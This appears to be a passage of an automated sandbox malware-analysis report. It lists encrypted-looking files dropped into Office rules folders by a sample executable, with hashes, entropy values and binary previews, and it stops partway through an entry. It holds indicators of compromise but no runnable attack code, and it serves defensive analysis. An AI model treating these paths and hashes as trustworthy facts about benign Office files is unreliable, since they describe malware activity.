                                                                                                                                      MD5:FF230EF6922A05D9FA9BFCA0BE9B9CE7
                                                                                                                                      SHA1:715AA1A77EFF74F0D551F646E3BA6C7744863494
                                                                                                                                      SHA-256:ABA0A9F10030699638B2310C8C763E446EDF27F112AB2C117A59A0A7ADD085DE
                                                                                                                                      SHA-512:B852594CE706A4DD1B984C1D3CD869D11C9DE8DCA3D416F6A4219C1B4A6F691B129BB303F79212E459EB077076075E2C54EEEBF6D4B97A0566FE8358AAC60119
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..z.....T..l.......ZJ.F!...2.p..T..<fQj..i...l6.f?.ai5...)...CV....}K.\%...|.....iV..{vY..3....i=S.8...NP..g.Pv.(.U....n.\....r.n.5....Z2.....Ov.8.oD..H.....}.D.S.........p......o.2.}_.L.y.E.g..#......&:M.].x...<.....@R..A.......P.]yL.[..}.(h+..eg..w...k..i-...F....(...If.0*....`:.S.m9.'S.do..Cjt..3..*...t5(:A......ep....s......R,..#..&0....\i$/..V5K....{jIt-.f..*.Ch.2E.....c...u..3.B;&.......6..k...........6..v..&u*S..].j...|..;..Z..0.c.q..!{..J..0.&..T7..G.1..ia.<..@.....).d.q.,/?...V3;..C..'.eU..!\..R.....:.P......^f.n.\e....-t..].....Z3.XC.(...8=.....:...0v.E#.*..bl..w^^..E.p.|C.dE....ev.:..va.?.H....`U.<%B....=....)C.4N.Zu.M...>......V.G.!... oF.]...L/.fB6.V.............XMl..i"u..Xc..b.I..=..i..o.P.........d.)6vXW.WSAo^l......Fb.ox\.,.og...o\t.-..3a....f..I.]..K..#q.8....<._.b.16.~../A..\.#.X.....I9r......D..Y$:.."N..-...8.U.....7X..V.4.zY..@.qw...X.=.e+k..h.....d.....2.O".tb..jq.:.y...3.04f7.E..........3.x.RM..M..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10819v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8769
                                                                                                                                      Entropy (8bit):7.9794926844109915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:8BSm2UbrvoHq+t2Tz0SgqYXtPjyUxbPZnul3L6uM06yWwQ37gksSiT:oRDoK+kz0YSPBNY3L6zGvD1T
                                                                                                                                      MD5:73E27798BF6481AA8733BC6E0B127D4F
                                                                                                                                      SHA1:F193E544C882CE5725A0D633412BCA32764C1A15
                                                                                                                                      SHA-256:005D5CCC2392BF4DEE16503A77A18FA9C9F0FA511B3096FFEE914AA7E4ADD60D
                                                                                                                                      SHA-512:20C86155CBF2C25A8CEA9FDFA329BA73B047E912BA8D8A7E72ED3E6F59356667F9462A56AEA632F8B0E84C2286B351295CCF088287880A4791064001442541F0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlj.....j...M...w5.W".5$.6....1O.k.y.~..r,C.......yq..M.NUp.='Lp..I&4...r.g.S../....C.))..G*........s~........1.Y.R..c.......;..N....o......g}y.F...T.D.H.V...sRx.8..3..E........."..[..g....Y1...%..b.S._-uv.]0...U..T....../..ra!....W.7...T".#.H......$h....vs...-]$.....?3p..T..KW.Z.j.Rw"[x..CDn.-]....G"Me...K.6;T..y[..\P2f....5b....f...y.Vl....+...Dh.>.....|..}.8...E.{..o..^J...k.{.B..0.....o...u.T.i.....R;O.i]Z.d6...=CJ.<.}.5.d(...._'.g....j.kX..H..l...,....0!Q3.k.........2...3M...rj...+.9.&.E ..*......4...r?oVu...!..5.9|c.O..-x.....v.....f.<..D...Ch.{1L.?m...%.....Z~Z...%...8u..4i..P.V#;j..u..& ......Y.B.Z.>N.!Z..1..@H..>j...5D.&q.../{...n...F.x.+.=...3.4[wD|+.2.aNS.<..).6........+t..|..E.V.@k.J.5W..Q....FO..A....X.R..k.y...z..10.n.M...v.8.R.9p.n.k..".K...S..H..)...g....Lvq..._.b.4n......v.g_j. ....]..b.ep..'....U........."..@:N.@<EK....SV.2.d>.j.L.....q....&U..[.b...........g2n.....\.?.......f......,oOw..V....Q6.C$....rP..@

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10820v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5842
                                                                                                                                      Entropy (8bit):7.9718470305992755
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:VW/gpiJd5pAN/YeIw2EwRdXa2IQA+QAdZfSJEFpK4NWyefylfrEonyFyXl:VWI4TLegeIw6RJaTQA+QGZuEFpKPj81j
                                                                                                                                      MD5:6E2FFFCD140C631758CA659FEA386E47
                                                                                                                                      SHA1:2AC9E95FCFCB94EF67F95019C36B35D535B52B66
                                                                                                                                      SHA-256:30DA5DCCB13A708E2076FF8BDEE5E4123D72F3B8AA2C9D7B7A01C4DAEA2581B9
                                                                                                                                      SHA-512:6804B4D2A234195924EE5BB594805943C57A06EE1F47C51ED66BFB37F74E89EF7894671AE947C511DA2C0932DEB961D73807647972BE10B4A55F8E5FA76EF3D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml........_l...6...e.......;.............g{>.t7../..8...]4..<..f(.0.U..,.~.....r....'/..NMD:....&..l......Q...{....Hn......Y..I..P.4..@.-..j....f|D...\].QK.i..1..e...B..LM.r.0.-.q.#..}.rg..t.M.`.r..7.j.<.m.5.&..7.......t#!...|t.....a.g7f.w ...~......j*l.......k....N...vH.\..(.%...v..2..3....-.(R.FUfG...._h.]w.%g....{UB%.T{.Y1.*..#..M.X.5..!T.,.6..[y.Ei...sL..VS....#c.k|.\.6.S.Hd...*R[.Q.q...-...o..zdO.l..K...!w...^.K=W...U.E...........Mq.#*%.<...[..Iz1->.{...I\..E>vd.T.e...s...-...3....q...5d1...........G....9.Y..?=...(.:.n...H....X.6y.K.....c..WrH.6..[..s."W.g3..|*..W..b%Vh0....7...fR}.*.L..o..~.....\.X[<.{...v..<.c...p.4l:.0.,...w.A._.......^I.D....A.;s....;.;.QJ./S.g..........x..EB.XI<eDCK.W.5..*.^.b..1(.......7b.!.7.fw...+.....:...^..>...q..r.BD..{.A..>a..#}t.h.u...9..#w...H..{|+WV.EU..-.Ew}.|..m3.8.?..R.1NH`...N.....j...aTW.O./...Mx.bh.."...o....z........Vc..8V\........O.>....h4.v..]VO+.k.......u]Av.d.%....0..(.._....*g.8.k..k?

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10821v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4787
                                                                                                                                      Entropy (8bit):7.9602731601894945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+jBXYqE/4lJckhofbGNxYAx619yQZ/bqGdTznioMca2apNWu:gYRc6KNx5x6bhbq6TFk2ap0u
                                                                                                                                      MD5:4B9C765CEC8D2D5D1258105F098DC847
                                                                                                                                      SHA1:371BBEAF70C8161EA1FC11CF414187126FB36423
                                                                                                                                      SHA-256:30A32E111CDF5C3CAC64BF62F9D0ECAEA5ACD5B8ADEE0E99A4F3CF1FCBB30B98
                                                                                                                                      SHA-512:7797717758C16FC3447D9253E99FD921EFC6D2EA2A1B1E9296D555656C3AA07354733867E2A1A361ADB8CBA0F5F74F6DB6FCFA9BE1200E59F807A6F4F423030D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..]...d...n....S..(....FX..HG.s......I.. .M.=.9h..M3...v.U&...%..s..ms./].tZ...U..d..4TB1.4.....8..K..;H.HFF..;%.60P.d.oG...}.......^5.......d..<.....{.V..s,......?..R>.p.`.P..[..RN[.k.Qb..|.h.._;.m.&c..6R9-...z.].........Pe......D... ..p........a..." ...I;&l>[...S....h...E.U.d.....h'f..l.G.....*...|....UO/Ms..X.T.2.....@<...].N...'..M.7.j......H...6n_m..C..AOJm...S..}...}...h.$.%Lp0.Abhm0S......E.......!f.F.q.;L.......9....6.1...Y.`.....l....3.E>|8:Ey.U..Hl........3.....X..to.c8.].w ...=.5..........}....%.O...F...Nr7q.?=..S.........Ml.F....V..D.......@^..2.K..c.M7...........'.,Q....{..t...#....u.....SY...z.$.v~.B.p......@c.....^...v.?@..|..9..U\%.:..~[..9b;d._.......FzA..EX..b.(.>.?.n.)..l..;'e:....D....tD'....w....T....P...vp.D.....Q....R.>..B.......3..p...B..pQ....L..'%...b?,...)...^-.mI.]..........9.....0{.L..W.....jN..ov{.-.!.....s..Zo.....T..4...>.&i..G.Y..|..<3U{W.[....[~/..F.L......."....|P...q..t:.. .Hx: .;...|.d...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10822v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4786
                                                                                                                                      Entropy (8bit):7.962572684491692
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:pF5NxEAppGaPu3L6y8Ev3iGhmjEMw2GKfvUtbIbHgi/Qzm4iPB+O9iAgX:pX/EATNElbS2fwBsb8gi/QgPBIR
                                                                                                                                      MD5:9E99A2D5BBD496EBF9411435AAF06B46
                                                                                                                                      SHA1:6A9E7668F37EA83B0BE56E00CD056EA7835ECCEB
                                                                                                                                      SHA-256:4F6955CE7E9BD684592012C50321E29A3BDFAB3DCF270502B80F273E79EF3AE6
                                                                                                                                      SHA-512:6BF51E6010035063B7EAC5791D61C3B9958610B3813CC583CD4B495CC948B93A05357E1E589693053B09CA136A3AD84EFC1EC7333352FD00488865D387ED53AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..6.2.>.....9....Z...c.].!......^.\..p../.....A-.T>..6..I.............1..>..L..abA.V..hV..S5.,..>.....A.|.c.......2..a..{..d....?..A.r..%.V..is.p\T.l..^4P..X.+8I@...s....w}......E..WU.Z..N..W<.......1I...S.J.H..6.A#.[;.A+....8.`.9GP3[.....&....h^.4`......#i........?;.7.1.R(....,.O:..).P.t..d.......X..XZI:;.h..^.Q..........'.3U4.b.....# .z^w...V.6-......>........(J..@r..A..."....e..2~.=.+....=#b.S.....c.z.....,.....s?..1..w..:[.o.NF...(..E4A.\..f.Y.).#.........|..fa........1lB.......!>.......uGt.......BW.'..b..@..u~..=_..M..e.G..Zb.)..gS.).....T>.9.....VA...?...W%9..N...d~).@."om..2..3..M.fl..\..#..4-......E...To.'.......&.:...C.!..g.M!..$..6<..2.i6..A..?.w}.c..d.....(..5..yK@rVMs.....xs...p..#L.H..xp... ..hTbK-wT...x.0....Z'H~........o..Gm...L.8.*3....,.V...f...1...f~GW,g...@.A...V..O.r..>t.C..A.//>.a8...*.@....P..ZK.j.}.C.P.Y2......XO..[T.<.J.p......u.._.....w.U-..^..K..R....N;....C}..1{..!.*n\....+.=....=......QWJ......]..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10829v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3030
                                                                                                                                      Entropy (8bit):7.933735298661023
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ci3ub8wEdmrJ25SWzoMca+ZzHxbVWwYeOqMCfyRx0DbiRBwpBF7FdJSK2k2D78bX:ci3ub8wEGJM3cvZzHNYeOqZYxWbRp3vt
                                                                                                                                      MD5:0C14FF6682F45BA66C04032F0456DAB3
                                                                                                                                      SHA1:C433798305126EA98B87A3279BC7C1DD19A0A97E
                                                                                                                                      SHA-256:454F0BAEA882FE47F26FD001C4CC3115ADAE55267F9A55E52608886420CBA2B5
                                                                                                                                      SHA-512:88472E76055499E899148694F7315788F7BF5EA71CAFC36F935841D667304138F07071D82889EF82B5702B7990860FD8C58B312546CC2D25365E84336FA5DD94
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......p7H...U......Q.j50i..........}.{...P.,....^.&n.|......,...OF...pb...@~]I.a...]..W]DU.!.'..e..Fl3k....s..}7..}]dLO+..Y..DV....J..}..2...NDou....f..m.V.L.8..g.b..o.m[H4.Q...{............o.h......J..:..n..:.......Z.g{.....Rs xQzlE!^.b....+.....?.z6,.,Rr\|.i -Or2M.R....Fz.}.6....%..+..,..i.l.s..F...o.q....S...3E..WY(</.nD.t.9 .n...w.z.D.D.@.mm7....zz).f8Fn.v...Ym.$.S.n.!.j.......F.....v.e.....dM.*/9n@Z....<)f..Vf.Z.y ..f..m..g.*.B.......E7...K.]\.\8Y....>p_.1.^.G..8(9f........W[..8.<`.-.....^.{.7.._QS(E..3.+l%&.<......w.{.)............6..LM...O.c.`.......v..g.....u8...;.v..d7.h.hH...7...u~...;.rf.|...N.%..62.%..H..[.....@bs.<E.vG..L.A...46l..g..Nk....54:..S~R....^.. ..e....P...........0.3.4T/..4...Pa...I.......)..=<....r..[..[;..Dk.."....u..#,.v.H].~....CxA.D.......c.X.#......_g.8|.y..s.,.6...z......pT..=..X...'...>..Nk+IV.q.......H...)J.].........B...t.XV2..N....B`...S..%...j.[.....A.....M..^.c..|.UWc:.L....y.2c1.2./_.K...k......j.r.e.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10879v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):789
                                                                                                                                      Entropy (8bit):7.7256114204020285
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0Nimj3kPN7fqaCtCW6dsYVihygptkxKZWF7kabD:oiI3kPNrqPtCWxFygptgxFdD
                                                                                                                                      MD5:CEBDD2C3D17039B223649E36F04EF7F1
                                                                                                                                      SHA1:9B504F06B66C1CCFB42641A27CB229F73F6F1780
                                                                                                                                      SHA-256:572C741B4159AEEDA9C2A62E707B567217AD308F77B60C1FA89672F820BFF0FF
                                                                                                                                      SHA-512:387857379273C500B9BAA4B1C9458EDD7FC7D0C888B2A4ED8F79B72FCA6AFA3B29188990837D525EF63DED2479D81C9A1E0DAA69DB5C66EB9CBF83938061727F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlR.?.....n.D`..n..d<Bm.!..t.67....D.Qn.(.F......-.A4.$.Q..}O..r..........g....;...-^....%0X.(.O5....M...|o.yh..X.6..hf..^..CeI..a..(ZK.. ....'.*x.9.Y...8G+.Z. 8.4v...z..a.0V.:.B.5..5jzq.?..`.}.<.h3.....9...9..9......*.%..0...KK..7..<m._$G...JK2r...AW.e.4..!...3o. ..._.!...K2r.^.N.....5..A.....G..C)'.k.Z7.7w..>....9. ..~Yb6U.....`..M..._)...........l>T|.6.u..?.8O....M..!.JL.z.....J20D.PVB5.l..w...xw.[[q.+.....G..W.O..6.A..Y.*.\.V?f[...%.k.}.....t5..V.(p.......VX...,.<.O..*a..F..m.........-........'.}cdV..Ex....x.=.....bO...^...L1......n|....mVLWk..f..kN.yR.i.J..............U..T.1.+EX.e...+sv'E.`....n{N...t9@.SEbO.t...N....~:#.N.R.[..5.B....UO.>...ux.`.#0/..0=.b...n.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10880v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3017
                                                                                                                                      Entropy (8bit):7.933300761770664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:h9kl/yaMAjT3f5yhPlkkVEtzJtA90rmhGDAcU+/Nvtw/lIoiRfmvEYL84qggXcgX:h+l/FdjT3f0NkkVEtzfAy6I1U2tgriRn
                                                                                                                                      MD5:3103BD8498A153EB5013E90D35C4E0E4
                                                                                                                                      SHA1:4C21F4A1370B0E5157056697853227F609E0C2C5
                                                                                                                                      SHA-256:6BD86B6BC121E472C42422637BEE79E2ED33D00281E1D626BB6E137F6D369591
                                                                                                                                      SHA-512:283E731B40C008286344D3DD34E4F6B70A4EF816EDA5C99337219AE461C890A40B90908358FAB4D446D2266034B447C4E62F80993DF907E284A7A91962E085BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...7Y.....h.X..7Y/d..6.x..9w....i...S....A9.]..#[m..6s.....U.7.V..Zo.L........9...%q.^....1.Ngy.. =T.J.A.{U..#......"......>.}...........U.=(.m....b#...%.4...u.Gx...WP.X.<h.2C..H..P~S....y.O3..zV...T... .gq&.LQ>...R.=.Y.b...|..[0..lpe..`.pad7.W..eC.....37i.j|eL&d.....d.A..y.=.V(..~.Q3}.fjg.n%....g2._.@..%nF4.....#.. ......`.z..w..O(L..LL}.>........".4[.......:.\.D.j2.Z...y..'.|.v./&=uU^R....?!.[.l...Z.6e$..p.nI&..@...3l.2..+..U..J.j...p...tz5....-"C)s.c....O?.Xh.OuJ.....0..G..6R^..TO%.r}.La(.m..b.A..C.d....I.z.R8.....=.\..{#Q(.o.....S..X#........t.......N.M/a...'.v........+....Z\..L{..L.K8.......9.[l.>...>&...j.hd.z.cs..Kvv.#U..&h...]....t5g.j.9......\2.t:.k....l..l..;..Wv....._r..j\.G.},n'2h..o,.w....Z;...A.c..>..!z.J.)41Z.ES.w.....aL&.q.c..lU...&..y.}.$.S;.d...f.....6S....W+...t...?m..>R.-!3k2....K.K.S....xC.w..S.;.....!$].,.Z....n... ..Z..Ff$K.i.........0.K..r........e..|....+,8...Le...eE+..J..Lrb."..oW.....{c. ..,nQ..=.69.`

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11498v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):747
                                                                                                                                      Entropy (8bit):7.704835894980102
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:aojpxF0fOb9FHimoCyuCGlOziXfMX+FfFUnzrmUxlZTav6aYukIcii9a:/l0W7im1rCpOQQOxWjbD
                                                                                                                                      MD5:3AEAACAC6B9DA1C69799FD5FCDFF7F50
                                                                                                                                      SHA1:9E9AF655C7C03CBF6904B8E66A8F2DC588CB309F
                                                                                                                                      SHA-256:F71018BE1D7C28E8C9D53686EE42D0A9EBD024B14029D1B43463D2318BE806C9
                                                                                                                                      SHA-512:A60AD7D844B8C70AC7F42F453314CBB80BE418D903224F64E60BBF5C55FC720056E8A2804351BF2C6624C719F75D2DC6146980723769D0BBC976DA5D85943877
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.%.R.d.E!..e...v...4.H..5.u%}(_.$~..........V4.sx...$....m.8..s...*{.r....L...(...=.S..].?.r.[.b..@3..8^.R........EwF.\..{i.0....Ep.....I9O..R*.....j..sUee..w)|.M..X..Y...f.......=........9.@..|X!.%=...T.]..K...#.r..J...sDY...=.D..0.c...B].q...AF2...V.I'....t....#z.,.W.v...\Q........=.....s..g......=.U....^.g.....^...1J.9g..[...<..^t.....`.v...h.J......#...*N....&....<R.L.....tQ"_.@wb..9$.g#............-..$...S?..d...[....N.?h...@..Y..k...v...~....3{.ri..p..(.....V.E.$....ov,.~Pz.y..z.+9...]A)...Um.S.v6e..'-./f-.7gb.....$S....8#.k6.K...V.jMA...\".$5...7..c;.....A.V....%......A.....G..p.4=i....K....N%..8...Xb.B..-~.'G.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11499v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1786
                                                                                                                                      Entropy (8bit):7.883437838888512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:UnmCrO+yRq/60tSRZvPVy6FsJbhB/DaDMHwsD:GbwRFBPVyZaD+n
                                                                                                                                      MD5:F05DECF57054369B0285B9CE63E0D886
                                                                                                                                      SHA1:7D4644111BB91A6EB8F341A41B7F0D48AE0F0FBA
                                                                                                                                      SHA-256:C0D953D106F9521C8BE4DCFD5FCE3395EAA0AE3E821DFEB35D9D817A33A398CF
                                                                                                                                      SHA-512:6144DB392FCD7D8107A145A49077C4BCF40456AEEEDB5B44DFA3988EB97324ECCD465E148896601F6003C822535962B2E58C4D35B0F581389F5855CB4488B3BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml'..{q.O.z..Ii.....\...j.J.{.g`.=.R........K?/....O.V...m.e...j.m..9C)""B.I...+..;.ri....L.|.HX[.Y......zh../......}.....W.w.h....f.R....kD...Z.B'u...B..p.:.$..6'.....RR.Ia......'.........}..&..;QjN,tA..W...Z.&m.Epd;.c...[...f.-F..f7...6@:8.Cw7XO`..Jw..XCp.%K.6.*xl...8.!.x.Hn.k-<..R.;.~.|..6.....5X$..,z.W<...B............W.@.\...."..._.2_.|.Z....:..KMX.R.Fnr>...A.......+.ZV........}OY..W; w..r._W&?R&r..Q..7.f0tX.).W S..;y.4Y.7...#.T'WTl.n.._....Z..ooB.D.w.P..R...._Q...ha.#wo..H....8.a7.|.Y....2)7.Q.Y..W..]>@...8|..?.P...!lg.y...|v6.MJ+./......x#...#..r&.[..k...!.X.i[Fvn...M....W.O.\..v........P.k...m...I..+...&#........./(..*.1...w.h..<.y}7F.......$...<.p..RK.O.gc...^...Pd....E....MW.........Nl.{....M.U......O...(.i.-0.....d..........dg.*.d..........h.Sy.)......l.s).)...........$.{.(...^.yC.{...sLo.<S`4.. ...Y..q.Y=FF.w.+....c...6.e.>..d.~....=..U..]......W..md.n.%..,..}....f../,X.)...o...gr.O.Ok.PX....`D.W.S.G.yNY8.`.L...4].).c.t....a.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11500v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):886
                                                                                                                                      Entropy (8bit):7.711981245780149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Jk2ju6UOApXA7Yc8qm1mwCb4OMT7fpUG9ucBu7bD:Jo1AUJmwCbDM3pH9QD
                                                                                                                                      MD5:A91C3A92EAAE9439ACEB769D0CADE8A7
                                                                                                                                      SHA1:F067B5B774402FC724BF415FC1161FAA6B267CFD
                                                                                                                                      SHA-256:300AA8B8599501C8377DF6C4A49AD6A2C5B01A8308093EF21F927D5D2187F181
                                                                                                                                      SHA-512:3BD91C0AA3434C8C0EDCFDF3343E10F9D508709C840452E9B010805D48F6BEE1F2DBCC347D1B9CCE20A7D60FB93C2FB8A934AC7A1C3F58F4FB8791E580DD5D17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.)]..F..I...1`.i@.5..pu..f.8H.x...)@.A1... %s.G.\.f.......A....8...E.;...7.Y.AK...ML..c.......r..'..Qj._A.WV.r..^......88........K.2...P..Q.......F..L.......V...rM.=.....r..|...zE.I.....U8.e..-6).Y.......mQ.v[p6..d.tq7.T..z*M..".3.t..I.*.)........>p.....f?Tp.d..yQ .'.....PzY#.7.;.V|WA..U.F...j)-.......f...$....oXm.....B...F.\. I...M.G.s.5K.7...U..../....o.....C..:vT5..r.td.o....D.Q...#....S*,..x.:C...hC+....>&..(y1C.........T.y-B5.u.......aP....p....w...%.e..l..~....PFR@.H..a.._.#.=....f0=.Z.7.1.h..-..:.M.;a.*\D{.$.?.\..'\E...&.....D...er].Q2....yH.d..%.y..........j....<a.P.j..~....._......<...U.J-.Zz...2..\..-.. p...!..W.\T.....%.........f..-..+s....3...3.)k=.{&9ADs.@....-.l..T...B7.6..Q..U.y<.LI._..L|.k..c...l..J...&.xn.......C...?1.S..B..0*..n..W!.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11502v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1324
                                                                                                                                      Entropy (8bit):7.823320317017707
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:p8a1gUsvzo1dIDWrG8BpLIKnPW5MqpIb/Xbpm0x0U6S7iyc5NyJtpbD:p8aqw1diKG8D7qNgXxf8OJD
                                                                                                                                      MD5:2C362CBDC437AFAED910D85B0C69BCB7
                                                                                                                                      SHA1:053E144A9CE3907469641EB68765AAC4FA9AE360
                                                                                                                                      SHA-256:E146EAFB26D099413FA9B1A133B82ED8DDB87CBFA1B1A757C66AF90CE1CADB41
                                                                                                                                      SHA-512:54397E1CD81E62A916B1BAF29143AE13979A22E4AE502CD262157A952E20A8CEEE6EBEBFF00B8E05E6E51D3F835BE226E13D9F097EA9E3EB4C24F39E411A6359
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..F..(A:R....5...:V....r..+.j#o..'e3..>o...4.............z. ...P."..N.;..j.F..rk...J.AP.f.KD..V.9._ ...:`.G|4U.5....U@K..n...=?-..M.R..-...!.Q.......T.>GY......I...(...#m.j1X..A...A.ZX....e93..!..P.S ..8.A9..G:b.VO..$U...f!......9.5/<&..c..Kt%e.o.o...............HU...X@.e..>..Q.lk4...5q..CC[4...k:......}.(NT..@...]j-....Z.......d........Pg~.-~p.K......60..l.n.lFsK.>......r....c.!5...:.Q.W.vp?..@.Na....Y..{...m...<.g.DJ.|oRA..\+....tI.Y{.C...`%..4;M1...1o4......qp)..Zq.a~y@N-.......%....wj.S-u.:....O...T.....]y.....Y...F}...kd^..Z.B..r....j...g.Y......`F-RD...oo%F...6.U..v.....:.>..p....7P.i{)xC..cw...h......:....s..d..S.5.*$.?.j.....*.JB.aE.0....{....z.P3F....6t..}. BP...*....N.!..rD..neE?u...O;s..Pw...51a..(..Vt.....u~....._a1P.C...z...`....t.fK........w$........l..k..=.1P.R....e..K....`..a....0.>N..^.1.F..Ge.p@"."...g....?.2.Mi......`h/...`4C..-.._3..]....E.O.9Z?..pd..%F.......zAn..V.....t...Y...R.V.M.....*K..L...j.M.Z.i..[*a.=..k$..Vm:X...Dc?qB.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11504v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1435
                                                                                                                                      Entropy (8bit):7.870533665786194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:S+/qIbAf7ugCZsCJjsFurJhYJhFNHg07tuQq6haZXGFm+RNbD:hSpfvCWCjsFurqhNtfhaZWTRtD
                                                                                                                                      MD5:074D00BAC3E56024BDC2A4C902F42A62
                                                                                                                                      SHA1:2071BF7A2DD1591386A4B1D1733980AC5787CBC5
                                                                                                                                      SHA-256:5BF925F46CD2DA53CA013D46A3BB6A0BB2EBA017F855324D7B4B02F937CB6E05
                                                                                                                                      SHA-512:DA7E693F807B2972C3B44E051547CCD7F26BAD691CBD1D62DCB14DC1653935F488FC5B7A45EF8EABB4B01BEBDA08537DB45549E162453D878C1AABAD857A0D24
                                                                                                                                      Malicious:false
